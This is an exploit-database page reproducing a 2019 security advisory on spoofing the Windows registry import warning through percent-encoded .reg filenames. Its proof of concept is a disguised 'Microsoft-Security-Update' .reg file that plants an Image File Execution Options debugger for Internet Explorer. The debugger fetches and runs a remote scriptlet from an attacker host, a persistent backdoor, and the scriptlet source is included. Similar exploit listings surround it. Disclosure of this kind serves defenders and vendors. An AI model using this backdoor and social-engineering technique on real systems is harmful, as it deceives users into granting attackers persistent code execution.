Menu

Improved exploit search engine. Try python and hit enter

"Microsoft Windows - .reg File / Dialog Box Message Spoofing"

Author

hyp3rlinx

Platform

windows

Release date

2019-03-13

Release Date Title Type Platform Author
2019-03-21 "DVD X Player 5.5.3 - '.plf' Buffer Overflow" local windows "Paolo Perego"
2019-03-21 "Canarytokens 2019-03-01 - Detection Bypass" dos windows "Gionathan Reale"
2019-03-20 "NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow" local windows "Peyman Forouzan"
2019-03-19 "Advanced Host Monitor 11.92 beta - Local Buffer Overflow" local windows "Peyman Forouzan"
2019-03-19 "Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject" dos windows "Google Security Research"
2019-03-19 "Microsoft VBScript - VbsErase Memory Corruption" dos windows "Google Security Research"
2019-03-19 "Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML" dos windows "Google Security Research"
2019-03-18 "WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service" dos windows Achilles
2019-03-18 "WinMPG Video Convert 9.3.5 - Denial of Service" dos windows Achilles
2019-03-15 "Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow" remote windows "Joseph McDonagh"
2019-02-22 "WinRAR 5.61 - Path Traversal" local windows WyAtu
2019-03-14 "FTPGetter Standard 5.97.0.177 - Remote Code Execution" remote windows w4fz5uck5
2019-03-13 "Apache Tika-server < 1.18 - Command Injection" remote windows "Rhino Security Labs"
2019-03-13 "Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution" local windows "Eduardo Braun Prado"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Microsoft Windows - .reg File / Dialog Box Message Spoofing" dos windows hyp3rlinx
2019-03-11 "PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution" webapps windows M4LV0
2019-03-11 "NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)" local windows "Devin Casadey"
2019-03-12 "Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)" dos windows Hodorsec
2019-03-08 "McAfee ePO 5.9.1 - Registered Executable Local Access Bypass" webapps windows leonjza
2019-03-07 "Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)" local windows Hodorsec
2019-03-04 "MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal" webapps windows 0v3rride
2019-03-04 "Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)" webapps windows "Matteo Malvica"
2019-03-04 "STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)" local windows "Ivan Ivanovic"
2019-03-04 "Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion" dos windows "Fahad Aid Alharbi"
2019-03-01 "Cisco WebEx Meetings < 33.6.6 / < 33.9.1 - Privilege Escalation" local windows SecureAuth
2019-02-28 "TransMac 12.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-25 "Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)" dos windows "Logan Whitmire"
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
Release Date Title Type Platform Author
2019-03-13 "Microsoft Windows - .reg File / Dialog Box Message Spoofing" dos windows hyp3rlinx
2019-01-23 "Microsoft Windows CONTACT - HTML Injection / Remote Code Execution" local windows hyp3rlinx
2019-01-17 "Microsoft Windows CONTACT - Remote Code Execution" local windows hyp3rlinx
2019-01-15 "Microsoft Windows VCF - Remote Code Execution" local windows hyp3rlinx
2018-12-04 "NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage" webapps hardware hyp3rlinx
2018-11-13 "Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service" dos windows hyp3rlinx
2018-11-12 "D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery" webapps hardware hyp3rlinx
2018-10-23 "ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection" webapps windows hyp3rlinx
2018-09-03 "FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection" webapps windows hyp3rlinx
2018-08-29 "Argus Surveillance DVR 4.0.0.0 - Directory Traversal" webapps windows_x86 hyp3rlinx
2017-12-01 "Artica Web Proxy 3.06 - Remote Code Execution" webapps php hyp3rlinx
2017-12-01 "MistServer 2.12 - Cross-Site Scripting" webapps multiple hyp3rlinx
2017-10-15 "Webmin 1.850 - Multiple Vulnerabilities" webapps cgi hyp3rlinx
2017-09-28 "Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection" webapps php hyp3rlinx
2017-09-28 "Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery" webapps php hyp3rlinx
2017-09-28 "Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure" webapps php hyp3rlinx
2017-09-28 "Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption" webapps windows hyp3rlinx
2017-09-28 "Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure" webapps php hyp3rlinx
2017-08-21 "Apache2Triad 1.5.4 - Multiple Vulnerabilities" webapps php hyp3rlinx
2017-06-05 "Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting" webapps windows hyp3rlinx
2017-06-05 "Subsonic 6.1.1 - Server-Side Request Forgery" webapps windows hyp3rlinx
2017-06-05 "Subsonic 6.1.1 - Cross-Site Request Forgery" webapps windows hyp3rlinx
2017-05-20 "Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery" webapps php hyp3rlinx
2017-05-15 "Mailcow 0.14 - Cross-Site Request Forgery" webapps php hyp3rlinx
2017-04-16 "Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset" webapps php hyp3rlinx
2017-04-14 "Concrete5 CMS 8.1.0 - 'Host' Header Injection" webapps php hyp3rlinx
2017-03-31 "Splunk Enterprise - Information Disclosure" webapps multiple hyp3rlinx
2018-02-14 "NAT32 2.2 Build 22284 - Cross-Site Request Forgery" webapps windows hyp3rlinx
2018-02-14 "NAT32 2.2 Build 22284 - Remote Command Execution" webapps windows hyp3rlinx
2017-03-10 "FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery" webapps xml hyp3rlinx
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46533/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec          
 

[Vendor]
www.microsoft.com


[Product]
A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.


[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing


[CVE Reference]
N/A


[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user.
This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor
its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful.

Normally when a user opens a .reg file UAC will launch (if user is run as Admin) if targeting a non privleged user we can still hijack HKCU reg settings
without having to deal with UAC. After they will get the registry security warning dialog box asking them if they "trust the source" and
"Are you sure you want to continue?" etc and will also have a choice of either 'Yes' or 'No' to select from.

However, we can inject our own messages thru the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?"
dialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its
default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0.

Example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0.

This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like.
Potentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them.

Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10:
------------------------------------------------------------------------------------------------
Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us
"the keys and values contained in <REGFILE> have been successfully added to the registry".

We can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the
end of our filename using %1 or %25 like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If don't want to use (null) use %3 but it will display a asian char instead but still prevents the secondary registry dialog box you.
You will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog box, depending on Windows OS version you will get different results.

% - can be used for obfuscation e.g. %h%a%t%e = hate
%b will create white-space
%n makes a newline
%r makes a newline
%1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import!
%0 Important terminates string
%25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import!
%3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char)
%5 (Windows 10) duplicates the default registry dialog box message by "n" amount of times per amount of %5 injected into the filename 
%25 (Windows 7) duplicates the default registry dialog box message by "n" amount of times per amount of %25 injected into the filename 
%2525 prevents registry editor from opening
%169 will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc

Each injected character can be separated by a percent "%" sign without messing up our spoofed message, we can leverage this to obfuscate the end of the filename.
We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed in the registry dialog box.

The filename "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" will show as "Microsoft-Security-Update-v1.2-Windows-10.reg"
in the registry dialog box, along with our spoofed user directions.
 
While this spoofing vulnerability requires user interaction and bypassing Windows UAC (if targeting Admin) prompt to succeed, the fact the we can prevent secondary
registry dialogs and modify registry messages displayed to the user makes it a viable attack vector. If we are successful in our attack we can achieve a persistent
RCE backdoor all while the user thinks they have aborted the import. Moreover, targeting a non privileged user allows us to hijack programs and not worry about UAC.


[POC Video URL]
https://vimeo.com/322684636


[Exploit/POC]
Persistent Remote Code Execution Backdoor: 

This will add entry to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe"
for a persistent rundll32 payload targeting MSIE that references a JScript XML based file on our remote server.

1) Create a Windows .REG Registry file named.

"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

Registry file Contents.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:http://<ATTACKER-IP>/backdoor\")"


2) Create an XML file hosted at http://ATTACKER-IP/backdoor named simply as "backdoor" will execute Windows calc.exe when Microsoft Internet Explorer is launched.

<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>
</component>
</package>



[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: March 1, 2019
MSRC Response: " A registry file was created with the title you suggested, but the error message was clear."
Then vendor sent me a link pointing me to the "Definition of a Security Vulnerability" Lol.
March 10, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx